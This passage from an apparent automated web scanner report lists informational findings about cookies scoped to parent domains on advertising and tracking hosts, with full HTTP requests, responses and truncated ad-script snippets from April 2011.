Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"; netseer_v3_gp="1000,1,www.identityguard.com,0,0,4,pxl3fd3ead87a3ded68,1303614595694,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:EXTERNAL:1303614595018"

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Date: Sun, 24 Apr 2011 03:09:57 GMT
Server: Apache-Coyote/1.1
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:CAESELOuaNIo-ALjWWVJnFruZF0:1303614597862"; Version=1; Domain=.netseer.com; Max-Age=63072000
Content-Length: 42
Connection: keep-alive

GIF89a.............!.......,...........D.;

17.73. http://cmi.netseer.com/redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cmi.netseer.com
Path:   /redirect

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /redirect?ex=10&t=1303614597199 HTTP/1.1
Host: cmi.netseer.com
Proxy-Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: netseer_v3_gi="1327,10542,www.marketminute.com,0,0,1,imp3fd315f009766d06,1303536932410,"; netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824"; netseer_v3_lvi="2:usr3fd49cb9a7122f52:1303083764824,1303536932417,aHR0cDovL3d3dy5tYXJrZXRtaW51dGUuY29tLw,US-TX-623-Dallas"

Response

HTTP/1.1 302 Moved Temporarily
Date: Sun, 24 Apr 2011 03:09:55 GMT
Location: http://cm.g.doubleclick.net/pixel?nid=netseer1
Server: Apache-Coyote/1.1
Set-Cookie: netseer_v3_vi="2:usr3fd49cb9a7122f52:1303083764824,10:EXTERNAL:1303614595018"; Version=1; Domain=.netseer.com; Max-Age=63072000
Content-Length: 0
Connection: keep-alive


17.74. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fkrypt.com%2fdedicated%2f HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2ljtllp0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; acs=012020h1ljtllpxzt1tzu; clid=2ljtllp01170xrd52zkwjuxh09ikd00634010h06406; rdrlst=4020znmlk346200000001340110poljyxb4000000033401; sglst=2020s0t7ljyxb4046uy00334010h03403ag3ljyxb4046uy00334010h03403; vstcnt=417k010r014uzg6118e1002

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0cf4q00736010i01407; Domain=media6degrees.com; Expires=Fri, 21-Oct-2011 16:35:03 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40315xylk60qf0000000136010znmlk346200000002360110poljyxb4000000043601; Domain=media6degrees.com; Expires=Fri, 21-Oct-2011 16:35:03 GMT; Path=/
Set-Cookie: sglst=2020s0t7ljyxb4073fb00436010i01404ag3ljyxb4073fb00436010i01404; Domain=media6degrees.com; Expires=Fri, 21-Oct-2011 16:35:03 GMT; Path=/
Set-Cookie: vstcnt=417k010r014uzg6118e1002; Domain=media6degrees.com; Expires=Fri, 21-Oct-2011 16:35:03 GMT; Path=/
Location: http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTEwMzkmdGw9NDMyMDA=&piggybackCookie=xrd52zkwjuxh
Content-Length: 0
Date: Sun, 24 Apr 2011 16:35:03 GMT


17.75. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzAvY2F0LzMyNTc5Mjk  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzAvY2F0LzMyNTc5Mjk

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzAvY2F0LzMyNTc5Mjk HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Fri, 21-Oct-2011 19:44:39 GMT; Path=/
Content-Type: text/javascript
Content-Length: 150
Date: Sun, 24 Apr 2011 19:44:39 GMT

new Image().src="http://r.turn.com/r/beacon?b2=BUZnutw2qFUI7sBlwdc9kXSUS8P8yUumiPyYOI98PvhYO1UR3WDfKVsb3GrekZXMJ-VfmV87kwAEvRy0NRYXyQ&cid=&bprice=";


17.76. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDU2ODU  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDU2ODU

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDU2ODU HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://www.creditreport.com/dni/default.aspx?PageTypeID=HomePage3&SiteVersionID=967&sc=671917&bcd=comptst&s_kwcid=TC|14081|instant%20credit%20report%20free||S|b|7587846271&gclid=CLv8q_e1tqgCFYLc4Aod_H_yBQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Sat, 22-Oct-2011 00:34:42 GMT; Path=/
Location: http://r.turn.com/r/beacon?b2=k-hABjwaz4vY_SYSODGI74jjjFhp9GU93kn7m8IpuKlYO1UR3WDfKVsb3GrekZXMu49Bz098v7GwzMMsUVOvCg&cid=&bprice=
Content-Length: 0
Date: Mon, 25 Apr 2011 00:34:41 GMT


17.77. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUwOTQ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUwOTQ

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUwOTQ HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://www.freecreditscore.com/dni/default.aspx?PageTypeID=HomePage21&SiteVersionID=932&SiteID=100323&sc=671212&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4110685209277066740

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4110685209277066740; Domain=.audienceiq.com; Expires=Fri, 21-Oct-2011 19:44:39 GMT; Path=/
Location: http://r.turn.com/r/beacon?b2=AYQ_0CdLCQsxFOFa2_kItqH2QV_AenG_sXoZjNYK-KtYO1UR3WDfKVsb3GrekZXMJmc0Saq2SB7f4Qt_mnTrKA&cid=&bprice=
Content-Length: 0
Date: Sun, 24 Apr 2011 19:44:39 GMT


17.78. http://d.audienceiq.com/r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUxMDM  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUxMDM

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dd/id/L21rdC83My9jaWQvMjY0MTU1NS90LzIvY2F0LzI2NDUxMDM HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d.audienceiq.com
Cookie: uid=7227032295465204149

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=7227032295465204149; Domain=.audienceiq.com; Expires=Sat, 22-Oct-2011 00:52:46 GMT; Path=/
Location: http://r.turn.com/r/beacon?b2=doruVzYOl1-XNYz023NiC7C5GQgewb8E-kOIojWkcztYO1UR3WDfKVsb3GrekZXMcNjKQffycmYvO8MyJ_088g&cid=&bprice=
Content-Length: 0
Date: Mon, 25 Apr 2011 00:52:45 GMT


17.79. http://d7.zedo.com/bar/v16-405/d2/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fm.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-405/d2/jsc/fm.js?c=286&a=0&f=&n=929&r=13&d=9&q=&$=&s=123&z=0.3447061919141561 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1; FFad=0; FFcat=929,286,14

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,9:929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "82a0ef50-838c-4a12afe0ff680"
Vary: Accept-Encoding
X-Varnish: 1634234217 1634232398
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=123
Expires: Sun, 24 Apr 2011 16:00:08 GMT
Date: Sun, 24 Apr 2011 15:58:05 GMT
Connection: close
Content-Length: 2458

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='';var zzC
...[SNIP]...

17.80. http://d7.zedo.com/bar/v16-405/d2/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d2/jsc/fmr.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bar/v16-405/d2/jsc/fmr.js?c=286&a=0&f=&n=929&r=13&d=14&q=&$=&s=123&z=0.5585765927098691 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=929,286,14;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "831e6297-8181-4a12afe7ac640"
Vary: Accept-Encoding
X-Varnish: 1634235142 1634232783
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=39
Expires: Sun, 24 Apr 2011 16:00:25 GMT
Date: Sun, 24 Apr 2011 15:59:46 GMT
Connection: close
Content-Length: 2368

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=123;var zzPat='';var zzC
...[SNIP]...

17.81. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.3521318055453627 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1; FFgeo=2241452; FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21; FFad=3:3:0:0; ZEDOIDA=xlO0TcGt89Z-t7Q0A2jzc9p9~042411; ZEDOIDX=21; FFCap=1574B809,210841,210133,210132,204732,204731|0,1,1:0,1,1:0,1,1:0,1,1:0,1,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:17 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:3:3:0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1574B809,210841,210133,210132,204732,204731|0,1,1:0,1,1:0,1,1:0,1,1:1,1,1;expires=Tue, 24 May 2011 16:46:17 GMT;path=/;domain=.zedo.com;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=244
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:46:17 GMT
Connection: close
Content-Length: 2147

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...

17.82. http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fm.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-405/d3/jsc/fm.js?c=1050&a=0&f=&n=809&r=21&d=7&q=&$=&s=376&z=0.39779967732526683 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: FFcat=809,1050,3:809,1050,9:809,1050,7:809,1050,21

Response

HTTP/1.1 500 Internal Server Error
Server: ZEDO 3G
Content-Length: 157
Content-Type: text/html
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:46:46 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,7:809,1050,3:809,1050,9:809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:None:None:None;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1574B809,204731|0,1,1;expires=Tue, 24 May 2011 16:46:46 GMT;path=/;domain=.zedo.com;
Set-Cookie: ZEDOIDA=9lO0TcGt89aSPx9eFv62EiFe~042411;expires=Wed, 21 Apr 2021 16:46:46 GMT;domain=.zedo.com;path=/;
ETag: "426044b-838c-4a12b036d4100"
Vary: Accept-Encoding
X-Varnish: 920078456
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=215
Expires: Sun, 24 Apr 2011 16:50:22 GMT
Date: Sun, 24 Apr 2011 16:46:47 GMT
Connection: close

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (500 Internal Server Error) has occured in response to this request.
</BODY>
</HTML>

17.83. http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-405/d3/jsc/fmr.js

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bar/v16-405/d3/jsc/fmr.js?c=1050&a=0&f=&n=809&r=21&d=21&q=&$=&s=376&z=0.7153747249743863 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: d7.zedo.com
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Mon, 23 Apr 2012 16:45:58 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=809,1050,21;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Mon, 25 Apr 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=xlO0TcGt89YsDMgJ3lU7cLwy~042411;expires=Wed, 21 Apr 2021 16:45:58 GMT;domain=.zedo.com;path=/;
ETag: "426044d-8181-4a12b03c8ce80"
Vary: Accept-Encoding
X-Varnish: 1634248835 1634247186
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=263
Expires: Sun, 24 Apr 2011 16:50:21 GMT
Date: Sun, 24 Apr 2011 16:45:58 GMT
Connection: close
Content-Length: 2733

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=376;var zzPat='';var zzC
...[SNIP]...

17.84. http://data.adsrvr.org/map/cookie/google  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.adsrvr.org
Path:   /map/cookie/google

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /map/cookie/google?g_uuid=CAESEA3NkbgBJciWS7F8ZrJI0tc&cver=1 HTTP/1.1
Host: data.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://insight.adsrvr.org/track/conv?pid=2ktjv7m&fmt=1&ct=0:RMLanding&v=1&vf=USD&adv=v1oo6vo&coid=3zvxjhl
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Cache-Control: private,no-cache, must-revalidate
Content-Type: image/gif
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Date: Mon, 25 Apr 2011 00:32:57 GMT
Pragma: no-cache
Set-Cookie: TDID=1cf8781b-f036-4ffe-a17c-988bc661e967; domain=.adsrvr.org; expires=Wed, 25-Apr-2012 00:32:57 GMT; path=/
Set-Cookie: X-Mapping-fjhppofk=79D79D0E3FB84166CA25A6036E2D4D48; path=/
Content-Length: 70

GIF89a...................!..NETSCAPE2.0.....!.......,................;

17.85. http://ds.addthis.com/red/psi/sites/krypt.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/krypt.com/p.json

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/psi/sites/krypt.com/p.json?callback=_ate.ad.hpr&uid=4dab4fa85facd099&url=http%3A%2F%2Fkrypt.com%2Fdedicated%2F&ref=http%3A%2F%2Fkrypt.com%2F&yrfn6b HTTP/1.1
Host: ds.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh39.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; uit=1; psc=4; di=1303529621.60|1303529621.1FE; dt=X; uid=4dab4fa85facd099

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 305
Content-Type: text/javascript
Set-Cookie: bt=; Domain=.addthis.com; Expires=Sun, 24 Apr 2011 16:35:02 GMT; Path=/
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Tue, 24 May 2011 16:35:02 GMT; Path=/
Set-Cookie: di=%7B%7D..1303662902.1FE|1303662902.60; Domain=.addthis.com; Expires=Tue, 23-Apr-2013 16:35:02 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Expires: Sun, 24 Apr 2011 16:35:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 24 Apr 2011 16:35:02 GMT
Connection: close

_ate.ad.hpr({"urls":["http://pixel.33across.com/ps/?pid=454&uid=4dab4fa85facd099","http://cspix.media6degrees.com/orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2
...[SNIP]...

17.86. http://ehg-swisscom.hitbox.com/HG  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ehg-swisscom.hitbox.com
Path:   /HG

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

